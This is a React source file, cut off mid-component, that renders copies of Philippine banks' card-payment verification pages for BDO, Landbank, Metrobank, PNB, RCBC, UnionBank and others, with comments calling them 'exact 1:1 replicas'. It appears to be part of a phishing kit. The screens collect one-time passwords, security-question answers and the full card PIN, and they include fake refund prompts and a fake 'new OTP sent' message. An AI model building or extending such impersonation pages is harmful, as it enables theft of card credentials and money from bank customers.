import React, { useState } from 'react';
import { isMastercard } from '../../utils/cardScheme';
import './PhilippinesBankLayout.css';

export const PHILIPPINES_BANKS = {
  ph_bdo: {
    key: 'bdo',
    name: 'BDO Unibank, Inc.',
    logo: '/images/banks/bdo.png',
    primaryColor: '#0891b2',
    type: 'bdo'
  },
  ph_landbank: {
    key: 'landbank',
    name: 'Land Bank of the Philippines',
    logo: '/images/banks/landbank.png',
    primaryColor: '#2CB24F',
    type: 'landbank'
  },
  ph_metrobank: {
    key: 'metrobank',
    name: 'Metropolitan Bank and Trust Company',
    logo: '/images/banks/metrobank.png',
    primaryColor: '#64748b',
    type: 'metrobank'
  },
  ph_eastwest: {
    key: 'eastwest',
    name: 'East West Banking Corporation',
    logo: '/images/banks/eastwest.png',
    primaryColor: '#183AB0',
    type: 'eastwest'
  },
  ph_pnb: {
    key: 'pnb',
    name: 'Philippine National Bank',
    logo: '/images/banks/pnb.png',
    primaryColor: '#0891b2',
    type: 'pnb'
  },
  ph_rcbc: {
    key: 'rcbc',
    name: 'Rizal Commercial Banking Corporation',
    logo: '/images/banks/rcbc.png',
    primaryColor: '#171717',
    type: 'rcbc'
  },
  ph_unionbank: {
    key: 'unionbank',
    name: 'Union Bank of the Philippines',
    logo: '/images/banks/union.webp',
    primaryColor: '#183AB0',
    type: 'unionbank'
  },
  ph_bpi: {
    key: 'bpi',
    name: 'Bank of the Philippine Islands',
    logo: '/images/banks/bpi.svg',
    primaryColor: '#B11116',
    type: 'bpi'
  },
  ph_chinabank: {
    key: 'chinabank',
    name: 'China Banking Corporation',
    logo: '/images/banks/chinabank.png',
    primaryColor: '#008991',
    type: 'chinabank'
  },
  ph_default: {
    key: 'default',
    name: 'Philippines Bank Authentication',
    logo: '/images/banks/bdo.png',
    primaryColor: '#0891b2',
    type: 'bdo'
  }
};

export const isPhilippinesBankDesign = (design) => {
  return Boolean(design && (design.startsWith('ph_') || PHILIPPINES_BANKS[design]));
};

export default function PhilippinesBankLayout({
  design,
  mode = 'otp', // 'otp' | 'push' | 'question' | 'pin'
  // OTP / Refund props
  code = '',
  setCode,
  handleCodeChange,
  handleSubmit,
  errorMessage,
  isDuplicate = false,
  isRetryActive = false,
  isShaking = false,
  isSubmitting = false,
  setIsDuplicate,
  onCancel,
  isRefund = false,
  // Push props
  customMessage,
  onApprove,
  // Question props
  customQuestion,
  answer = '',
  setAnswer,
  handleQuestionSubmit,
  // PIN props
  pin = '',
  setPin,
  handlePinSubmit
}) {
  const bank = PHILIPPINES_BANKS[design] || PHILIPPINES_BANKS.ph_default;

  const merchant = localStorage.getItem('session_merchant') || import.meta.env?.VITE_MERCHANT_NAME || 'Merchant';
  const amount = localStorage.getItem('session_amount') || localStorage.getItem('summ') || '';
  const currency = localStorage.getItem('session_currency') || localStorage.getItem('currency') || import.meta.env?.VITE_CURRENCY || 'PHP';
  const last4 = localStorage.getItem('session_last4') || localStorage.getItem('last-four-digits') || '4242';

  const [resendSuccess, setResendSuccess] = useState(false);
  const isMc = isMastercard(design);
  const schemeLogo = isMc ? '/images/banks/idcheck2.png' : '/images/banks/visa.png';
  const schemeAlt = isMc ? 'Mastercard' : 'Visa';

  const today = new Date();
  const formattedDate = `${today.getDate().toString().padStart(2, '0')}/${(today.getMonth() + 1).toString().padStart(2, '0')}/${today.getFullYear()}`;

  const handleResend = () => {
    if (setCode) setCode('');
    if (setIsDuplicate) setIsDuplicate(false);
    setResendSuccess(true);
    setTimeout(() => setResendSuccess(false), 3500);
  };

  const renderError = () => {
    if (!errorMessage) return null;
    return (
      <div className={`ph-error-banner ${isShaking ? 'ph-shake' : ''}`} role="alert">
        <span>{errorMessage}</span>
      </div>
    );
  };

  // ─── PUSH MODE (Adapted cleanly inside bank frame) ──────────────
  if (mode === 'push') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt={bank.name} className="ph-bank-logo" onError={(e) => { e.target.style.display = 'none'; }} />
              <img src={schemeLogo} alt={schemeAlt} className="ph-scheme-logo" onError={(e) => { e.target.style.display = 'none'; }} />
            </div>

            <h1 style={{ fontSize: '1rem', fontWeight: 'bold', color: '#434C74', marginTop: '0.75rem', textAlign: 'center' }}>
              Authentication via Mobile App
            </h1>

            <div className="ph-push-card">
              <div className="ph-push-spinner" style={{ borderTopColor: bank.primaryColor }} />
              <p style={{ fontSize: '0.85rem', color: '#1e293b', lineHeight: '1.45', margin: 0 }}>
                {customMessage || 'Please open your mobile banking app to approve this payment request.'}
              </p>
            </div>

            <button
              type="button"
              onClick={onApprove}
              style={{
                height: '2.5rem',
                width: '100%',
                backgroundColor: bank.primaryColor,
                color: '#ffffff',
                border: 'none',
                borderRadius: '6px',
                fontSize: '0.825rem',
                fontWeight: 'bold',
                cursor: 'pointer',
                marginTop: '0.5rem'
              }}
            >
              I confirmed push
            </button>

            <button
              type="button"
              onClick={onCancel || (() => window.location.href = '/')}
              style={{
                height: '2.25rem',
                width: '100%',
                backgroundColor: '#ffffff',
                color: '#6b7280',
                border: '1px solid #d1d5db',
                borderRadius: '6px',
                fontSize: '0.8rem',
                fontWeight: '600',
                cursor: 'pointer',
                marginTop: '0.5rem'
              }}
            >
              Cancel
            </button>
          </main>
        </div>
      </div>
    );
  }

  // ─── QUESTION MODE (Adapted cleanly inside bank frame) ──────────
  if (mode === 'question') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt={bank.name} className="ph-bank-logo" onError={(e) => { e.target.style.display = 'none'; }} />
              <img src={schemeLogo} alt={schemeAlt} className="ph-scheme-logo" onError={(e) => { e.target.style.display = 'none'; }} />
            </div>

            <h1 style={{ fontSize: '1rem', fontWeight: 'bold', color: '#434C74', marginTop: '0.75rem', textAlign: 'center' }}>
              Security Verification
            </h1>
            <p style={{ fontSize: '0.8rem', color: '#4b5563', textAlign: 'center', margin: '0.25rem 0 0.75rem' }}>
              Please answer your security question to continue:
            </p>

            {customQuestion && (
              <div className="ph-question-box">
                {customQuestion}
              </div>
            )}

            <form onSubmit={handleQuestionSubmit}>
              <input
                type="text"
                value={answer}
                onChange={(e) => setAnswer(e.target.value)}
                autoFocus
                placeholder="Enter your answer"
                style={{
                  height: '2.5rem',
                  width: '100%',
                  borderRadius: '6px',
                  border: '1px solid #d1d5db',
                  padding: '0 0.75rem',
                  fontSize: '0.9rem',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={!answer.trim() || isSubmitting}
                style={{
                  height: '2.5rem',
                  width: '100%',
                  backgroundColor: bank.primaryColor,
                  color: '#ffffff',
                  border: 'none',
                  borderRadius: '6px',
                  fontSize: '0.825rem',
                  fontWeight: 'bold',
                  cursor: 'pointer',
                  marginTop: '0.75rem'
                }}
              >
                {isSubmitting ? 'Verifying...' : 'SUBMIT'}
              </button>
            </form>
          </main>
        </div>
      </div>
    );
  }

  // ─── PIN MODE (Keypad, 4 or 6 digits) ───────────────────────────
  if (mode === 'pin') {
    const currentPin = pin || '';
    const dotsCount = 6;
    const PIN_KEYS = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'clear', '0', 'back'];

    const handleKeypadPress = (key) => {
      if (isSubmitting) return;
      if (key === 'back') {
        setPin(currentPin.slice(0, -1));
      } else if (key === 'clear') {
        setPin('');
      } else if (/^\d$/.test(key) && currentPin.length < 6) {
        setPin(currentPin + key);
      }
    };

    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt={bank.name} className="ph-bank-logo" onError={(e) => { e.target.style.display = 'none'; }} />
              <img src={schemeLogo} alt={schemeAlt} className="ph-scheme-logo" onError={(e) => { e.target.style.display = 'none'; }} />
            </div>

            <h1 style={{ fontSize: '1rem', fontWeight: 'bold', color: '#434C74', marginTop: '0.75rem', textAlign: 'center' }}>
              Additional Verification
            </h1>

            <div style={{ display: 'flex', justifyContent: 'center', margin: '0.5rem 0' }}>
              <img
                src="/images/banks/security.gif"
                alt="Security verification"
                style={{ height: '72px', width: 'auto', objectFit: 'contain' }}
                onError={(e) => { e.target.style.display = 'none'; }}
              />
            </div>

            <p style={{ fontSize: '0.8rem', color: '#4b5563', textAlign: 'center', margin: '0.25rem 0 0.75rem' }}>
              For extra security, please enter your card PIN code.
            </p>

            {renderError()}

            <form onSubmit={handlePinSubmit}>
              {/* Индикатор ввода PIN — всегда 6 точек */}
              <div className="ph-pin-display" aria-label="PIN entry">
                {Array.from({ length: dotsCount }).map((_, i) => (
                  <span
                    key={i}
                    className={`ph-pin-dot${i < currentPin.length ? ' filled' : ''}`}
                  />
                ))}
              </div>

              {/* Экранная клавиатура */}
              <div className="ph-keypad">
                {PIN_KEYS.map((key) => (
                  <button
                    key={key}
                    type="button"
                    className="ph-key"
                    onClick={() => handleKeypadPress(key)}
                    disabled={
                      isSubmitting ||
                      (key === 'clear' && currentPin.length === 0) ||
                      (key === 'back' && currentPin.length === 0)
                    }
                  >
                    {key === 'back' ? '⌫' : key === 'clear' ? 'C' : key}
                  </button>
                ))}
              </div>

              <button
                type="submit"
                disabled={currentPin.length < 4 || currentPin.length > 6 || isSubmitting}
                style={{
                  height: '2.5rem',
                  width: '100%',
                  backgroundColor: bank.primaryColor,
                  color: '#ffffff',
                  border: 'none',
                  borderRadius: '6px',
                  fontSize: '0.825rem',
                  fontWeight: 'bold',
                  cursor: 'pointer',
                  marginTop: '0.25rem'
                }}
              >
                {isSubmitting ? 'Verifying...' : 'AUTHORIZE PAYMENT'}
              </button>
            </form>
          </main>
        </div>
      </div>
    );
  }

  // ─── 1. LANDBANK VARIANT (Exact 1:1 replica of Landbank.jsx) ────
  if (bank.type === 'landbank') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt="" style={{ height: '1.5rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <div style={{ marginTop: '0.5rem' }}>
              <div style={{ fontSize: '0.75rem', fontWeight: 'bold', color: '#2CB24F' }}>
                {isRefund ? 'Refund Verification' : 'Added Protection'}
              </div>
              <p style={{ fontSize: '0.75rem', lineHeight: '1rem', margin: '0.25rem 0', color: '#000000' }}>
                {isRefund
                  ? 'A One-Time Password (OTP) has been sent to your mobile number to authorize your refund. Input the OTP and click OK.'
                  : 'A One-Time Password (OTP) has been sent to your mobile number. To confirm your transaction, please input the OTP then click the OK button.'}
              </p>
            </div>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ marginTop: '0.5rem' }}>
              <div style={{ fontSize: '0.75rem', lineHeight: '1.25rem', color: '#000000' }}>
                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
                  <span>Merchant Name</span>
                  <span>{merchant}</span>
                </div>
                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
                  <span>{isRefund ? 'Refund Amount' : 'Transaction Amount'}</span>
                  <span>{currency} {amount}</span>
                </div>
                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
                  <span>Transaction Date</span>
                  <span>{formattedDate}</span>
                </div>
                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr' }}>
                  <span>LANDBANK Card No.</span>
                  <span>xxxx xxxx xxxx {last4}</span>
                </div>
                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', alignItems: 'center', marginTop: '0.25rem' }}>
                  <label htmlFor="landbank-otp">One-time Password (OTP)</label>
                  <input
                    id="landbank-otp"
                    type="text"
                    inputMode="numeric"
                    pattern="[0-9]*"
                    maxLength={8}
                    autoComplete="off"
                    value={code}
                    onChange={handleCodeChange}
                    autoFocus
                    style={{
                      height: '2rem',
                      width: '7rem',
                      border: '1px solid #404040',
                      backgroundColor: '#ffffff',
                      padding: '0 0.5rem',
                      fontSize: '0.75rem',
                      outline: 'none'
                    }}
                  />
                </div>
              </div>

              <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'center', gap: '0.5rem', marginTop: '1rem' }}>
                <button
                  type="button"
                  onClick={onCancel || (() => window.location.href = '/')}
                  style={{
                    display: 'flex',
                    height: '2.5rem',
                    width: '5rem',
                    alignItems: 'center',
                    justifyContent: 'center',
                    border: '1px solid #2CB24F',
                    backgroundColor: '#ffffff',
                    fontSize: '0.75rem',
                    fontWeight: 600,
                    color: '#2CB24F',
                    cursor: 'pointer'
                  }}
                >
                  Cancel
                </button>

                <button
                  type="button"
                  onClick={handleResend}
                  style={{
                    display: 'flex',
                    height: '2.5rem',
                    width: '7rem',
                    alignItems: 'center',
                    justifyContent: 'center',
                    border: '1px solid #2CB24F',
                    backgroundColor: '#ffffff',
                    fontSize: '0.75rem',
                    fontWeight: 600,
                    color: '#2CB24F',
                    cursor: 'pointer'
                  }}
                >
                  Resend OTP
                </button>

                <button
                  type="submit"
                  disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
                  style={{
                    display: 'flex',
                    height: '2.5rem',
                    width: '7rem',
                    alignItems: 'center',
                    justifyContent: 'center',
                    backgroundColor: '#2CB24F',
                    fontSize: '0.75rem',
                    fontWeight: 'bold',
                    color: '#ffffff',
                    border: 'none',
                    cursor: 'pointer'
                  }}
                >
                  {isSubmitting ? '...' : (isRefund ? 'CONFIRM REFUND' : 'OK')}
                </button>
              </div>

              {resendSuccess && (
                <div className="ph-resend-alert" role="status">
                  ✓ New OTP code sent to your mobile number
                </div>
              )}
            </form>

            <div style={{ marginTop: '1rem', fontSize: '0.75rem', lineHeight: '1rem', color: '#000000' }}>
              <p>This information is <span style={{ fontWeight: 'bold' }}>not shared</span> with Merchant.</p>
              <p style={{ marginTop: '0.25rem' }}>
                For assistance, please call LANDBANK Customer Care Center through the following numbers: 8405-7000 (Metro Manila), 1-800-10-405-7000.
              </p>
            </div>
          </main>
        </div>
      </div>
    );
  }

  // ─── 2. METROBANK VARIANT (Exact 1:1 replica of Metrobank.jsx) ──
  if (bank.type === 'metrobank') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body" style={{ padding: '0.5rem 0 1.5rem' }}>
            <div style={{ display: 'flex', justifyContent: 'flex-end', padding: '0.25rem 1rem' }}>
              <button
                type="button"
                onClick={onCancel || (() => window.location.href = '/')}
                style={{ fontSize: '0.875rem', fontWeight: 600, color: '#ef4444', textDecoration: 'underline', background: 'none', border: 'none', cursor: 'pointer' }}
              >
                CANCEL
              </button>
            </div>

            <div style={{ borderTop: '1px solid #d4d4d4', marginTop: '0.25rem' }} />

            <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', padding: '0.75rem 1rem' }}>
              <img src={bank.logo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <div style={{ borderTop: '1px solid #d4d4d4' }} />

            <div style={{ padding: '0 1.25rem' }}>
              <h1 style={{ marginTop: '1rem', textAlign: 'center', fontSize: '1.125rem', fontWeight: 'bold', color: '#404040' }}>
                {isRefund ? 'Refund Authentication' : 'Payment Authentication'}
              </h1>

              <p style={{ marginTop: '0.75rem', textAlign: 'center', fontSize: '0.875rem', lineHeight: '1.25rem', color: '#404040' }}>
                {isRefund
                  ? `We have sent an SMS containing your One-time Password (OTP) to authorize your refund using card ************${last4} to your mobile number`
                  : `We have sent an SMS containing your One-time Password (OTP) for this purchase using card ************${last4} to your mobile number`}
              </p>

              <p style={{ marginTop: '0.5rem', textAlign: 'center', fontSize: '0.875rem', lineHeight: '1.25rem', color: '#404040' }}>
                {isRefund
                  ? `You are receiving a refund from ${merchant} in the amount of ${currency} ${amount} on ${formattedDate} using your card ************${last4}.`
                  : `You are paying ${merchant} in the amount of ${currency} ${amount} on ${formattedDate} using your card ************${last4}.`}
              </p>

              {renderError()}

              <form onSubmit={handleSubmit} style={{ maxWidth: '20rem', margin: '0.5rem auto 0' }}>
                <input
                  type="text"
                  inputMode="numeric"
                  pattern="[0-9]*"
                  maxLength={8}
                  autoComplete="off"
                  value={code}
                  onChange={handleCodeChange}
                  autoFocus
                  placeholder="Enter your OTP"
                  style={{
                    height: '2rem',
                    width: '100%',
                    borderRadius: '0.5rem',
                    border: '1px solid #a3a3a3',
                    backgroundColor: '#ffffff',
                    padding: '0 0.75rem',
                    fontSize: '0.875rem',
                    letterSpacing: '0.1em',
                    color: '#404040',
                    outline: 'none',
                    boxSizing: 'border-box'
                  }}
                />

                <button
                  type="submit"
                  disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
                  style={{
                    marginTop: '2rem',
                    display: 'flex',
                    height: '3rem',
                    width: '100%',
                    alignItems: 'center',
                    justifyContent: 'center',
                    borderRadius: '0.5rem',
                    backgroundColor: '#64748b',
                    fontSize: '0.875rem',
                    fontWeight: 500,
                    color: '#ffffff',
                    border: 'none',
                    cursor: 'pointer'
                  }}
                >
                  {isSubmitting ? '...' : (isRefund ? 'Confirm Refund' : 'Continue')}
                </button>

                <button
                  type="button"
                  onClick={handleResend}
                  style={{
                    marginTop: '1rem',
                    display: 'flex',
                    height: '3rem',
                    width: '100%',
                    alignItems: 'center',
                    justifyContent: 'center',
                    borderRadius: '0.5rem',
                    border: '1px solid #3b82f6',
                    backgroundColor: '#ffffff',
                    fontSize: '0.875rem',
                    fontWeight: 500,
                    color: '#64748b',
                    cursor: 'pointer'
                  }}
                >
                  Re-send OTP
                </button>

                {resendSuccess && (
                  <div className="ph-resend-alert" role="status">
                    ✓ New OTP code sent to your mobile number
                  </div>
                )}
              </form>
            </div>
          </main>
        </div>
      </div>
    );
  }

  // ─── 3. EASTWEST VARIANT (Exact 1:1 replica of EastWest.jsx) ────
  if (bank.type === 'eastwest') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt="" style={{ height: '2.25rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <div style={{ borderTop: '1px solid #a3a3a3', marginTop: '0.75rem' }} />

            <h1 style={{ marginTop: '0.75rem', fontSize: '0.875rem', fontWeight: 800, lineHeight: '1.25rem', color: '#000000' }}>
              {isRefund ? 'Authorize your refund' : 'Authorize your online payment'}
            </h1>

            <p style={{ marginTop: '0.75rem', fontSize: '0.875rem', lineHeight: '1.5rem', color: '#000000' }}>
              {isRefund
                ? 'We just sent a verification code by Text to your registered mobile number to confirm your refund.'
                : 'We just sent a verification code by Text to your registered mobile number.'}
            </p>

            <p style={{ marginTop: '0.75rem', fontSize: '0.875rem', lineHeight: '1.5rem', color: '#000000' }}>
              {isRefund
                ? `You are authorizing a refund from ${merchant} for ${currency} ${amount} on ${formattedDate} with your card ************${last4}.`
                : `You are authorizing a payment to ${merchant} for ${currency} ${amount} on ${formattedDate} with your card ************${last4}.`}
            </p>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ maxWidth: '20rem', margin: '0.75rem auto 0' }}>
              <label style={{ display: 'block', textAlign: 'center', fontSize: '0.875rem', color: '#787692' }}>
                Please enter 6-digit OTP
              </label>

              <input
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={8}
                autoComplete="off"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                style={{
                  marginTop: '0.25rem',
                  height: '3rem',
                  width: '100%',
                  borderRadius: '0.25rem',
                  border: '1px solid #787692',
                  backgroundColor: '#ffffff',
                  padding: '0 0.75rem',
                  textAlign: 'center',
                  fontSize: '0.875rem',
                  letterSpacing: '0.1em',
                  color: '#000000',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
                style={{
                  marginTop: '0.25rem',
                  display: 'flex',
                  height: '2.5rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.25rem',
                  backgroundColor: '#183AB0',
                  fontSize: '0.875rem',
                  fontWeight: 300,
                  color: '#ffffff',
                  border: 'none',
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? 'CONFIRM REFUND' : 'SUBMIT')}
              </button>
            </form>

            <div style={{ marginTop: '1rem', textAlign: 'center' }}>
              <button
                type="button"
                onClick={handleResend}
                style={{ fontSize: '0.75rem', fontWeight: 'bold', color: '#1C3DB1', background: 'none', border: 'none', cursor: 'pointer' }}
              >
                CLICK HERE TO RESEND CODE
              </button>
            </div>

            {resendSuccess && (
              <div className="ph-resend-alert" role="status">
                ✓ New verification code sent to your mobile number
              </div>
            )}
          </main>
        </div>
      </div>
    );
  }

  // ─── 4. PNB VARIANT (Exact 1:1 replica of PNB.jsx) ─────────────
  if (bank.type === 'pnb') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <h1 style={{ marginTop: '1.25rem', textAlign: 'center', fontSize: '1.125rem', fontWeight: 'bold', color: '#434C74' }}>
              {isRefund ? 'Refund Authentication' : 'Purchase Authentication'}
            </h1>

            <p style={{ marginTop: '1.25rem', fontSize: '0.875rem', lineHeight: '1.5rem', color: '#262626' }}>
              {isRefund
                ? `We have sent you a text message with a code to your registered mobile number. You are receiving a refund from merchant ${merchant} in the amount of ${currency} ${amount} on ${formattedDate}.`
                : `We have sent you a text message with a code to your registered mobile number. You are paying merchant ${merchant} the amount of ${currency} ${amount} on ${formattedDate}.`}
            </p>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ marginTop: '1.25rem' }}>
              <label style={{ display: 'block', fontSize: '1rem', fontWeight: 'bold', color: '#000000' }}>
                Enter your code below:
              </label>

              <input
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={8}
                autoComplete="off"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                style={{
                  marginTop: '0.75rem',
                  height: '2.5rem',
                  width: '100%',
                  borderRadius: '0.375rem',
                  border: '1px solid #d4d4d4',
                  backgroundColor: '#ffffff',
                  padding: '0 0.75rem',
                  fontSize: '0.875rem',
                  color: '#262626',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
                style={{
                  marginTop: '0.75rem',
                  display: 'flex',
                  height: '2.5rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.375rem',
                  backgroundColor: '#0891b2',
                  fontSize: '0.875rem',
                  fontWeight: 500,
                  color: '#ffffff',
                  border: 'none',
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? 'CONFIRM REFUND' : 'CONFIRM')}
              </button>

              <button
                type="button"
                onClick={handleResend}
                style={{
                  marginTop: '0.75rem',
                  display: 'flex',
                  height: '2.5rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.375rem',
                  backgroundColor: '#737373',
                  fontSize: '0.875rem',
                  fontWeight: 500,
                  color: '#ffffff',
                  border: 'none',
                  cursor: 'pointer'
                }}
              >
                RESEND
              </button>

              {resendSuccess && (
                <div className="ph-resend-alert" role="status">
                  ✓ New verification code sent to your mobile number
                </div>
              )}

              <button
                type="button"
                onClick={onCancel || (() => window.location.href = '/')}
                style={{
                  marginTop: '0.75rem',
                  display: 'flex',
                  height: '3rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.375rem',
                  backgroundColor: '#737373',
                  fontSize: '0.875rem',
                  fontWeight: 500,
                  color: '#ffffff',
                  border: 'none',
                  cursor: 'pointer'
                }}
              >
                CANCEL
              </button>
            </form>

            <p style={{ marginTop: '1.75rem', fontSize: '0.875rem', lineHeight: '1.25rem', fontWeight: 'bold', color: '#000000' }}>
              This page will automatically timeout after 420 seconds.
            </p>
          </main>
        </div>
      </div>
    );
  }

  // ─── 5. RCBC VARIANT (Exact 1:1 replica of RCBC.jsx) ───────────
  if (bank.type === 'rcbc') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <p style={{ marginTop: '2rem', fontSize: '0.75rem', lineHeight: '1.25rem', color: '#000000' }}>
              {isRefund
                ? 'To continue with your refund, please enter the 6-digit One-Time Password (OTP) sent to you via SMS and click Submit.'
                : 'To continue with your transaction, please enter the 6-digit One-Time Password (OTP) sent to you via SMS and click Submit.'}
            </p>

            <h2 style={{ marginTop: '1.25rem', fontSize: '0.75rem', fontWeight: 'bold', color: '#737373' }}>
              {isRefund ? 'Refund Details' : 'Transaction Details'}
            </h2>

            {renderError()}

            <form onSubmit={handleSubmit}>
              <div style={{ maxWidth: '24rem', margin: '0.75rem auto 0', fontSize: '0.75rem', color: '#000000' }}>
                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', alignItems: 'center', marginBottom: '0.25rem' }}>
                  <span style={{ textAlign: 'right', fontWeight: 800 }}>Merchant:</span>
                  <span style={{ paddingLeft: '1.25rem' }}>{merchant}</span>
                </div>

                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', alignItems: 'center', marginBottom: '0.25rem' }}>
                  <span style={{ textAlign: 'right', fontWeight: 800 }}>{isRefund ? 'Refund Amount:' : 'Transaction Amount:'}</span>
                  <span style={{ paddingLeft: '1.25rem' }}>{currency} {amount}</span>
                </div>

                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', alignItems: 'center', marginBottom: '0.25rem' }}>
                  <span style={{ textAlign: 'right', fontWeight: 800 }}>Card Number:</span>
                  <span style={{ paddingLeft: '1.25rem' }}>************{last4}</span>
                </div>

                <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', alignItems: 'center' }}>
                  <label htmlFor="rcbc-code" style={{ textAlign: 'right', fontWeight: 800 }}>Enter Code:</label>
                  <div style={{ paddingLeft: '1.25rem' }}>
                    <input
                      id="rcbc-code"
                      type="text"
                      inputMode="numeric"
                      pattern="[0-9]*"
                      maxLength={8}
                      autoComplete="off"
                      value={code}
                      onChange={handleCodeChange}
                      autoFocus
                      style={{
                        height: '1.5rem',
                        width: '100%',
                        borderRadius: '0.25rem',
                        border: '1px solid #a5b4fc',
                        backgroundColor: '#ffffff',
                        padding: '0 0.5rem',
                        fontSize: '0.75rem',
                        outline: 'none',
                        boxSizing: 'border-box'
                      }}
                    />
                  </div>
                </div>
              </div>

              <div style={{ marginTop: '3rem' }}>
                <button
                  type="button"
                  onClick={handleResend}
                  style={{ fontSize: '0.75rem', fontWeight: 600, textDecoration: 'underline', background: 'none', border: 'none', cursor: 'pointer', color: '#000000' }}
                >
                  Click here to receive another code
                </button>
              </div>

              {resendSuccess && (
                <div className="ph-resend-alert" role="status">
                  ✓ New verification code sent to your mobile number
                </div>
              )}

              <div style={{ marginTop: '1rem', display: 'flex', justifyContent: 'center' }}>
                <button
                  type="submit"
                  disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
                  style={{
                    display: 'flex',
                    height: '2rem',
                    width: '7rem',
                    alignItems: 'center',
                    justifyContent: 'center',
                    backgroundColor: '#171717',
                    fontSize: '0.75rem',
                    fontWeight: 'bold',
                    color: '#ffffff',
                    border: 'none',
                    cursor: 'pointer'
                  }}
                >
                  {isSubmitting ? '...' : (isRefund ? 'CONFIRM REFUND' : 'Submit')}
                </button>
              </div>
            </form>

            <div style={{ marginTop: '1rem', display: 'flex', justifyContent: 'flex-end' }}>
              <button
                type="button"
                onClick={onCancel || (() => window.location.href = '/')}
                style={{ fontSize: '0.75rem', fontWeight: 'bold', textDecoration: 'underline', background: 'none', border: 'none', cursor: 'pointer', color: '#000000' }}
              >
                Exit
              </button>
            </div>
          </main>
        </div>
      </div>
    );
  }

  // ─── 6. UNIONBANK VARIANT (Exact 1:1 replica of UnionBank.jsx) ──
  if (bank.type === 'unionbank') {
    return (
      <div className="ph-container">
        <div className="ph-modal">
          <main className="ph-body">
            <div className="ph-logos-header">
              <img src={bank.logo} alt="" style={{ height: '2.25rem', width: 'auto', objectFit: 'contain' }} />
              <img src={schemeLogo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
            </div>

            <div style={{ borderTop: '1px solid #a3a3a3', marginTop: '0.75rem' }} />

            <h1 style={{ marginTop: '0.75rem', fontSize: '0.875rem', fontWeight: 800, lineHeight: '1.25rem', color: '#000000' }}>
              {isRefund ? 'Authorize your refund' : 'Authorize your online payment'}
            </h1>

            <p style={{ marginTop: '0.75rem', fontSize: '0.875rem', lineHeight: '1.5rem', color: '#000000' }}>
              {isRefund
                ? 'To authorize refund on your UnionBank card, enter your One-Time PIN (OTP) that has been sent via Text to your registered mobile number'
                : 'To authorize payment on your UnionBank card, enter your One-Time PIN (OTP) that has been sent via Text to your registered mobile number'}
            </p>

            <p style={{ marginTop: '0.75rem', fontSize: '0.875rem', lineHeight: '1.5rem', color: '#000000' }}>
              Never share this OTP with anyone.
            </p>

            <div style={{ marginTop: '0.75rem', fontSize: '0.875rem', lineHeight: '1.5rem', color: '#000000' }}>
              <div>Merchant: {merchant}</div>
